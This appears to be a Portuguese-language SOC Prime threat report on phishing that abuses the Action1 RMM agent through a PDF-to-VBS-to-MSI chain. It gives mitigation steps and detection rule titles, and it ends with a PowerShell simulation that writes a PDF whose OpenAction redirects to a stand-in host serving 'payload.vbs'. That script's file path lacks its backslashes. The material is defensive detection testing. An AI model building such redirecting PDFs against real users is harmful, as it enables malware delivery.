SOC Prime Bias: High

06 Oct 2026 14:36 UTC

Abuso de Ferramentas RMM Continua a Crescer em Campanhas de Ameaças Ativas

Author Photo
SOC Prime Team linkedin icon Seguir
Abuso de Ferramentas RMM Continua a Crescer em Campanhas de Ameaças Ativas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os agentes de ameaça estão abusando de ferramentas de Gerenciamento e Monitoramento Remoto (RMM), particularmente do Action1, para estabelecer acesso persistente em ambientes comprometidos. O ataque começa com um e-mail de phishing contendo um PDF malicioso que redireciona as vítimas para um arquivo VBS. O script então baixa e instala um pacote MSI contendo o agente legítimo Action1, permitindo acesso remoto não autorizado.

Investigação

A investigação descobriu um PDF malicioso que utiliza as palavras-chave OpenAction e URI para iniciar um download de uma URL hospedada na Vercel. A análise do pacote MSI recuperado revelou arquivos legítimos da Action1 Corporation sendo usados indevidamente através da infraestrutura em nuvem do próprio fornecedor. O agente instalado contém um CustomerID específico e se comunica com um domínio legítimo do Action1.

Mitigação

As organizações devem configurar o filtro de e-mail para identificar estruturas de PDF suspeitas contendo as palavras-chave OpenAction ou URI. As equipes de segurança devem monitorar instalações não autorizadas de ferramentas RMM e a criação do serviço A1Agent. Bloquear conexões para infraestrutura em nuvem RMM inesperada e identificar CustomerIDs incomuns ou não autorizados pode reduzir ainda mais o risco de abuso de acesso remoto.

Resposta

Quando uma atividade maliciosa de RMM é detectada, isole o host afetado para evitar a execução de comandos remotos adicionais. Investigue o e-mail de phishing original e conduza uma análise forense dos arquivos VBS e MSI associados. Revogue credenciais potencialmente comprometidas e revise as configurações do agente Action1 em busca de indicadores de acesso remoto ou persistência não autorizados.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

LOLBAS WScript / CScript (via criação de processo)

Equipe SOC Prime
06 de outubro de 2026

Software Alternativo de Acesso Remoto / Gerenciamento (via criação de processo)

Equipe SOC Prime
06 de outubro de 2026

Possível Infiltração / Exfiltração de Dados / C2 via Serviços / Ferramentas de Terceiros (via proxy)

Equipe SOC Prime
06 de outubro de 2026

Possível Infiltração / Exfiltração de Dados / C2 via Serviços / Ferramentas de Terceiros (via dns)

Equipe SOC Prime
06 de outubro de 2026

Possível Atividade de Comando e Controle por Tentativa de Comunicação de Domínio de Software de Acesso Remoto (via dns)

Equipe SOC Prime
06 de outubro de 2026

IOCs (HashSha256) para detectar: Mais Ferramentas RMM à solta

Regras de IA SOC Prime
06 de outubro de 2026

Conexão Remota aos Servidores Corporativos Action1 [Conexão de Rede do Windows]

Regras de IA SOC Prime
06 de outubro de 2026

Redirecionamento de OpenAction e URI em PDF para VBS Malicioso [Evento de Arquivo do Windows]

Regras de IA SOC Prime
06 de outubro de 2026

Execução da Simulação

  • Narrativa e Comandos do Ataque: O adversário está simulando uma campanha de phishing. O objetivo é entregar um arquivo nomeado Recibo de Transação .pdf para uma vítima. O PDF é especialmente criado para que, assim que o usuário o abra, o /OpenAction comando acione um /URI redirecionamento. Este redirecionamento é projetado para levar o usuário a um site que serve um VBScript malicioso. Para acionar a regra de detecção específica fornecida, criaremos um arquivo com o nome e strings internas exatos requeridos.

  • Script de Teste de Regressão:

    # Script de Simulação: Acionando a Detecção de OpenAction em PDF
    $targetFile = "$env:USERPROFILEDesktopRecibo de Transação .pdf"
    
    # Criando o conteúdo "malicioso" em PDF para coincidir com as palavras-chave de detecção
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Gravando o arquivo no disco para acionar a detecção de 'file_event'
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "Arquivo de simulação criado em: $targetFile"
    Write-Host "Verifique seu SIEM para o alerta de detecção."
  • Comandos de Limpeza:

    # Limpeza: Remover o arquivo malicioso simulado
    $targetFile = "$env:USERPROFILEDesktopRecibo de Transação .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Limpeza concluída: $targetFile removido."
    } else {
        Write-Host "Limpeza: Arquivo não encontrado."
    }